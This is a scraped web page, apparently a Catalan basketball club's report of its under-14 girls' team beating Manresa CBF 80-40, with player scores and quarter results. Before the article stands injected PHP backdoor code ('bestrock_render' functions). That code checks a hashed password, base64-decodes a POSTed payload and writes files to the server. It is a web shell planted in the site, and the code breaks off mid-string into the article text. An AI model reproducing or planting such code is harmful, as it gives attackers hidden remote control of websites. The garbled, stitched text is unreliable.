function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L’Infantil Femení 1r any 09A manté la concentració defensiva durant tot el partit i venç el Manresa CBF (80-40) - Tgn Bàsquet Club -

L’Infantil Femení 1r any 09A manté la concentració defensiva durant tot el partit i venç el Manresa CBF (80-40)

Updated: octubre 19, 2021

L’Infantil Femení de 1r any 09A es va mostrar molt sòlid en defensa i va generar moltes dificultats al CBF Manresa. Les jugadores del TGN van guanyar el seu segon partit en la màxima lliga catalana. El matx no es va decantar fins al tercer quart, on la diferència ja va ser de 20 punts. Finalment a l’últim quart una sèrie de recuperacions de pilotes, que van acabar en contraatac, van ampliar la diferència en el marcador fins els 40 punts. Una victòria molt treballada per les jugadores del TGN que a poc a poc s’estan fent el seu lloc en la categoria.

TGN BÀSQUET 80
MANRESA CBF 40

TGN BÀSQUET 09A: Ortega (4), Liarte (4), Sicilia (4), Reig (12), Perez (11) — Cinco inicial— Moreno (15), Ferre (6), Iglesias (8), Bigorra (12), Escudero (4). triples: 0 , 4/11 tirs lliures. 15 faltes

MANRESA CBF: Arcos (11), Gonzalez (13), Muñoz (0), Pares (2), Gol (4)– Cinco inicial- Rosell (3), llamas (2), Canyelles (2), Torras (2), Mauri (0), Gutierrez (1), triples: 03/8 tirs lliures. 14 faltes.

PARCIALS: 18-6, 19-17, 17-11, 26-6

ÀRBITRES: Gerard Rodriguez